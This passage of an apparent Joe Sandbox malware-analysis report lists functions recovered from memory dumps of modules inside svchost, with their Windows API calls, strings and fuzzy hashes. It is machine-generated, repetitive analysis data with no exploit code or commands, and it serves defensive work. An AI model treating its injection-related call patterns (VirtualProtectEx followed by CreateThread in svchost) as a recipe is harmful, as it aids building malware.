                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: haproxy protocol not support with SSL encryption in place (QUIC?)$unsupported transport type %d
                                                                • API String ID: 0-551583306
                                                                • Opcode ID: 80d50f79aa8e2e0e1798be875ed64e65ca41722820d66fff8b0017b3ebf657c0
                                                                • Instruction ID: b5dbe52857994ddedd27f0f9fb6ff1c95388e80490b01a038ea8a75dc5aaff3a
                                                                • Opcode Fuzzy Hash: 80d50f79aa8e2e0e1798be875ed64e65ca41722820d66fff8b0017b3ebf657c0
                                                                • Instruction Fuzzy Hash: 9DA19B7A2087844AFB758FE5E8483E9ABB0A745FC4F884011DE6D4B795FB78C640E744
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: callocfree
                                                                • String ID:
                                                                • API String ID: 306872129-0
                                                                • Opcode ID: c678f5ed1600a8b959c48394a6695923d33b67fef965bb8b888b8516cc0fb7c3
                                                                • Instruction ID: 31e86a3fd8f08c75d311d53713074ed0b4322ae2544c8e742a090f4fdef2d4be
                                                                • Opcode Fuzzy Hash: c678f5ed1600a8b959c48394a6695923d33b67fef965bb8b888b8516cc0fb7c3
                                                                • Instruction Fuzzy Hash: 46714936105BC085E3219F74E8483CE76A4F746BB8F480339DAB90E7DADBB98144C721
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: CreateEventcalloc
                                                                • String ID: d
                                                                • API String ID: 2382962142-2564639436
                                                                • Opcode ID: f7e2894db741331a8fc1dc95fb01fb035a612877f8dc08512d1d4fdd7cec79f2
                                                                • Instruction ID: f0bf010d5afdeb5bed5a671fc1f495b3fe96e7161abd7981c259c0460e73aa83
                                                                • Opcode Fuzzy Hash: f7e2894db741331a8fc1dc95fb01fb035a612877f8dc08512d1d4fdd7cec79f2
                                                                • Instruction Fuzzy Hash: 13411C3A218A4091EB61DBA0D4913E9A3B5FB98FC4FC44535DA6D47699FF38C705E310
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: FormatMessagestrchrwcstombs
                                                                • String ID: Unknown error
                                                                • API String ID: 4171340688-83687255
                                                                • Opcode ID: 1a901455a9f3a64667489dd8f92dc32385fa8db47a44b5d6ab261f7e384b3a5a
                                                                • Instruction ID: 86a71d2f863220cd7fd31457d38ba08f1605654f98216c7a5752d7d498318c6d
                                                                • Opcode Fuzzy Hash: 1a901455a9f3a64667489dd8f92dc32385fa8db47a44b5d6ab261f7e384b3a5a
                                                                • Instruction Fuzzy Hash: 8D21927520C7C095EB318B66E8043DAA6A0AB8AFD4FC44214DABE03BD5EF7CC5419710
                                                                APIs
                                                                  • Part of subcall function 00000173D01AC700: GetModuleHandleA.KERNEL32 ref: 00000173D01AC746
                                                                  • Part of subcall function 00000173D01AC700: GetProcAddress.KERNEL32 ref: 00000173D01AC756
                                                                  • Part of subcall function 00000173D019FC30: GetModuleHandleW.KERNEL32 ref: 00000173D019FC44
                                                                • GetProcAddressForCaller.KERNELBASE ref: 00000173D01648A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc$Caller
                                                                • String ID: InitSecurityInterfaceW$secur32.dll$security.dll
                                                                • API String ID: 2824060896-1950755585
                                                                • Opcode ID: 7c02c1c736985d97e36572f55ab4815c32138ce75a420f4355de45eaa3645f69
                                                                • Instruction ID: be8fe1388db26a687bd71cac438a3fb063e5b642f6fcb7c1c69a51af39670258
                                                                • Opcode Fuzzy Hash: 7c02c1c736985d97e36572f55ab4815c32138ce75a420f4355de45eaa3645f69
                                                                • Instruction Fuzzy Hash: 89015E39B19B4582EF289B99E8917D9A3F0F745BC4FC84029996D83751FF7CC215A600
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                                                • API String ID: 0-3791222319
                                                                • Opcode ID: 0ff6bb89b665cf597bc51ea544f9db1bffba136d7b8ffb89bfd6ba5892530ca0
                                                                • Instruction ID: 63ee59fb8149c1cbe850d1b4c93a660f579155b6cc2908d0243e87db6e10c149
                                                                • Opcode Fuzzy Hash: 0ff6bb89b665cf597bc51ea544f9db1bffba136d7b8ffb89bfd6ba5892530ca0
                                                                • Instruction Fuzzy Hash: 28419E3A60864086FA31DEA6D6043ADA7B2A787FE4FD10211DE7E477D5FB39C641A700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2560283707.00000173D03B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000173D03B0000, based on PE: true
                                                                • Associated: 00000010.00000002.2559994947.00000173D03B0000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2560836688.00000173D03C6000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2561560882.00000173D03D1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2561932402.00000173D03D3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2562469981.00000173D03D9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d03b0000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocProcess
                                                                • String ID:
                                                                • API String ID: 1617791916-0
                                                                • Opcode ID: 49d25ca4c0d2d58532c0aa88b9a1a714c1b896cbf655224b34d246cfbb06d60a
                                                                • Instruction ID: a36241c62b1244f77e5823f11bfe3d0c14403389b4d834f1266dd5466eb183fb
                                                                • Opcode Fuzzy Hash: 49d25ca4c0d2d58532c0aa88b9a1a714c1b896cbf655224b34d246cfbb06d60a
                                                                • Instruction Fuzzy Hash: F4E06D3170160086E714AFA2D82C389B7F1FB88F86F88C028C91D47351DFBE85A99740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2560283707.00000173D03B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000173D03B0000, based on PE: true
                                                                • Associated: 00000010.00000002.2559994947.00000173D03B0000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2560836688.00000173D03C6000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2561560882.00000173D03D1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2561932402.00000173D03D3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2562469981.00000173D03D9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d03b0000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocProcess
                                                                • String ID:
                                                                • API String ID: 1617791916-0
                                                                • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                • Instruction ID: 7d5639ba676d07bb52b713e2b3db1e436179c95e61363d7ceaef6c2eea183e2b
                                                                • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                • Instruction Fuzzy Hash: 1CE0ED7171154086E718ABA2D918299B7B1FB88F56F888028C91947311DF7985A99614
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32 ref: 00000173D03B3811
                                                                • PathFindFileNameW.SHLWAPI ref: 00000173D03B3820
                                                                  • Part of subcall function 00000173D03B3D58: StrCmpNIW.KERNELBASE(?,?,?,00000173D03B272E), ref: 00000173D03B3D70
                                                                  • Part of subcall function 00000173D03B3CA4: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000173D03B3837), ref: 00000173D03B3CB2
                                                                  • Part of subcall function 00000173D03B3CA4: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000173D03B3837), ref: 00000173D03B3CE0
                                                                  • Part of subcall function 00000173D03B3CA4: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000173D03B3837), ref: 00000173D03B3D02
                                                                  • Part of subcall function 00000173D03B3CA4: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000173D03B3837), ref: 00000173D03B3D1D
                                                                  • Part of subcall function 00000173D03B3CA4: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000173D03B3837), ref: 00000173D03B3D3E
                                                                • CreateThread.KERNELBASE ref: 00000173D03B3867
                                                                  • Part of subcall function 00000173D03B1E38: GetCurrentThread.KERNEL32 ref: 00000173D03B1E43
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2560283707.00000173D03B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000173D03B0000, based on PE: true
                                                                • Associated: 00000010.00000002.2559994947.00000173D03B0000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2560836688.00000173D03C6000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2561560882.00000173D03D1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2561932402.00000173D03D3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2562469981.00000173D03D9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d03b0000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                • String ID:
                                                                • API String ID: 1683269324-0
                                                                • Opcode ID: c4f51b7847a1f98021941fe9320a796c4d22ffdd32b47b35cb34ea0b9caf4340
                                                                • Instruction ID: 6c6cffe8d40b8be3d238ae78d82b0008e1bc36cf584fe8d2676f900ba12deed7
                                                                • Opcode Fuzzy Hash: c4f51b7847a1f98021941fe9320a796c4d22ffdd32b47b35cb34ea0b9caf4340
                                                                • Instruction Fuzzy Hash: D4112D3061862081FB7AE7E1E6053D9A2B2AB54FC9FC04119A83E811A5DFFAC308A611
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastSleepgetsockopt
                                                                • String ID:
                                                                • API String ID: 3033474312-0
                                                                • Opcode ID: d3007daa6ba1534bb993b4a9225aa4e7a98e22bbefaf495e1ef6b3d265cceca8
                                                                • Instruction ID: c8542c793d32793b661650a80b1e1729c4b4c4bf5de9b2f3f86690318f9cc4e5
                                                                • Opcode Fuzzy Hash: d3007daa6ba1534bb993b4a9225aa4e7a98e22bbefaf495e1ef6b3d265cceca8
                                                                • Instruction Fuzzy Hash: F501443520C64187E7B08F95E4487AAE7B0F745FC4FE44024EA9D46BA4EB7DC545DB00
                                                                APIs
                                                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000173D015AAE9), ref: 00000173D01687FB
                                                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00000173D015AAE9), ref: 00000173D0168821
                                                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00000173D015AAE9), ref: 00000173D0168835
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ExclusiveLock$Release$Acquire
                                                                • String ID:
                                                                • API String ID: 1021914862-0
                                                                • Opcode ID: 5c02fb6c1fcb24a16d6f55f71e277d5c4db8b3561b8eb6c272e01fb65b4a3692
                                                                • Instruction ID: e776fac5961d1524ed16e2f2ee6fd923f66027fed342ceffe4a9ae31a44a7bfc
                                                                • Opcode Fuzzy Hash: 5c02fb6c1fcb24a16d6f55f71e277d5c4db8b3561b8eb6c272e01fb65b4a3692
                                                                • Instruction Fuzzy Hash: 91F0543862844595FB24ABA5ECE43EAA2B4BB95F84FC00020D02E861A4FF6CC749E350
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: swprintf_s
                                                                • String ID: %
                                                                • API String ID: 3896565401-2567322570
                                                                • Opcode ID: ec58da689996205f5b274bb9e7b14e4efa8a6914dc8b0300c4614caad90e7c10
                                                                • Instruction ID: 6a0982112ed6e03d1b1d3d1fea3d9b6148c94cb0c0e9246db351840e7159bdd4
                                                                • Opcode Fuzzy Hash: ec58da689996205f5b274bb9e7b14e4efa8a6914dc8b0300c4614caad90e7c10
                                                                • Instruction Fuzzy Hash: B621042330C7C489E7229711E4413EEBBA1E799784F48C126EECC17B89CB2DC649DB01
                                                                APIs
                                                                • memset.VCRUNTIME140 ref: 00000173CFC0F2E5
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00000173CFC0F595
                                                                  • Part of subcall function 00000173CFC11BD0: memmove.VCRUNTIME140(?,?,?,?,?,00000173CFC0C32B), ref: 00000173CFC11C2B
                                                                  • Part of subcall function 00000173CFC11BD0: memset.VCRUNTIME140(?,?,?,?,?,00000173CFC0C32B), ref: 00000173CFC11C38
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memset$_invalid_parameter_noinfo_noreturnmemmove
                                                                • String ID:
                                                                • API String ID: 48703092-0
                                                                • Opcode ID: 7ac7dec8e432cadfef363c3504a8cc20af8e12a7f67f43d9dcca2cd8afac82e6
                                                                • Instruction ID: 3486a4b7bb2cc9a9180c16b1fb2dc0b6428d1187234472cabdbe7694fcd0415f
                                                                • Opcode Fuzzy Hash: 7ac7dec8e432cadfef363c3504a8cc20af8e12a7f67f43d9dcca2cd8afac82e6
                                                                • Instruction Fuzzy Hash: DAC14B33B08B958AFB12DFA5D5403DC6771E748B98F408912DEAD27B59DE38C68AD340
                                                                APIs
                                                                  • Part of subcall function 00000173CFC36700: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00000173CFC03B13,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00000173CFC3670F
                                                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000003F,00000173CFC33E56,?,?,0000003F,00000000,?,0000003F,?,00000173CFC0FD86), ref: 00000173CFC0F61C
                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00000173CFC0F6B6
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Concurrency::cancel_current_task_lock_localesrealloc
                                                                • String ID:
                                                                • API String ID: 2876910798-0
                                                                • Opcode ID: 19c73d847408eb0d63e69c3f329de917da05adc446da4c3d1267b2b1ff8aaf5f
                                                                • Instruction ID: 271695acfe6bf9677f0c97485150084ab31ff6dfc68d93b4868020f5535c8f82
                                                                • Opcode Fuzzy Hash: 19c73d847408eb0d63e69c3f329de917da05adc446da4c3d1267b2b1ff8aaf5f
                                                                • Instruction Fuzzy Hash: 14417937309B4982EB15DF15E5803996370F788FC4F448922DAAE23B68DE39CA56E340
                                                                APIs
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173CFC0F731
                                                                  • Part of subcall function 00000173CFC04E20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173CFC05D4B), ref: 00000173CFC04E37
                                                                  • Part of subcall function 00000173CFC04E20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173CFC05D4B), ref: 00000173CFC04E4B
                                                                  • Part of subcall function 00000173CFC04E20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173CFC05D4B), ref: 00000173CFC04E5F
                                                                  • Part of subcall function 00000173CFC04E20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173CFC05D4B), ref: 00000173CFC04E73
                                                                  • Part of subcall function 00000173CFC04E20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173CFC05D4B), ref: 00000173CFC04E87
                                                                  • Part of subcall function 00000173CFC04E20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173CFC05D4B), ref: 00000173CFC04E9B
                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00000173CFC0F792
                                                                  • Part of subcall function 00000173CFC39D20: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00000173CFC51B71,?,?,00000000,00000173CFC05CE8), ref: 00000173CFC39D3A
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$Concurrency::cancel_current_taskExceptionThrowmalloc
                                                                • String ID:
                                                                • API String ID: 2506944222-0
                                                                • Opcode ID: 8c1d8eb806682c77dd72749f47572942c8448acf976269ac0f3bfc27fc70cc4c
                                                                • Instruction ID: e82d786c15c00f9d881247b9e779559b10206456a172a622e0bf05056d169f5f
                                                                • Opcode Fuzzy Hash: 8c1d8eb806682c77dd72749f47572942c8448acf976269ac0f3bfc27fc70cc4c
                                                                • Instruction Fuzzy Hash: 0B219237309B4692EA22DB15E5907D96370FB84B80F44CD23CAED53B65DF28C656E301
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: closesocketsocket
                                                                • String ID:
                                                                • API String ID: 2760038618-0
                                                                • Opcode ID: 27b388f8f4bc6737c7fb520ec9b203deaa45030ab93c0741097e461f5fa6597e
                                                                • Instruction ID: a4445b3bba25b0319ba5e55d2dd114ffcceaad2adc473ed5aa85760d5e04c904
                                                                • Opcode Fuzzy Hash: 27b388f8f4bc6737c7fb520ec9b203deaa45030ab93c0741097e461f5fa6597e
                                                                • Instruction Fuzzy Hash: E301D1267056C0C7FB6547E6E0C53E91760AB95FB0F4C82748A3E167E1DB6849D5A300
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ExclusiveLock$AcquireRelease
                                                                • String ID:
                                                                • API String ID: 17069307-0
                                                                • Opcode ID: 39a519f4624760cd79ac458549f5595ef9daf227755beea38229d5db3c9119c4
                                                                • Instruction ID: 00fdf4b1800da78a98fea4205ddbf76c1940dba4cdf94c9264fb7a08892eb316
                                                                • Opcode Fuzzy Hash: 39a519f4624760cd79ac458549f5595ef9daf227755beea38229d5db3c9119c4
                                                                • Instruction Fuzzy Hash: 82D0173871864482EB256BE0E8D43E86274A759B54FC41024C83E46351FBA88A8CE310
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2560283707.00000173D03B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000173D03B0000, based on PE: true
                                                                • Associated: 00000010.00000002.2559994947.00000173D03B0000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2560836688.00000173D03C6000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2561560882.00000173D03D1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2561932402.00000173D03D3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2562469981.00000173D03D9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d03b0000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $LMX
                                                                • API String ID: 0-1475574623
                                                                • Opcode ID: b4da42a706a87f17c2f2cfefd8112183663bfed5671a2c80788db3ec5171a75c
                                                                • Instruction ID: 23979416cc364d5db9e864ebd8044e3b2ef856530086ef227bd990b2b5b63ad1
                                                                • Opcode Fuzzy Hash: b4da42a706a87f17c2f2cfefd8112183663bfed5671a2c80788db3ec5171a75c
                                                                • Instruction Fuzzy Hash: D3D05E30716645C6EB79DFE5CAC46E0A3709B04F88FC88029992941110D79A9A9DE610
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
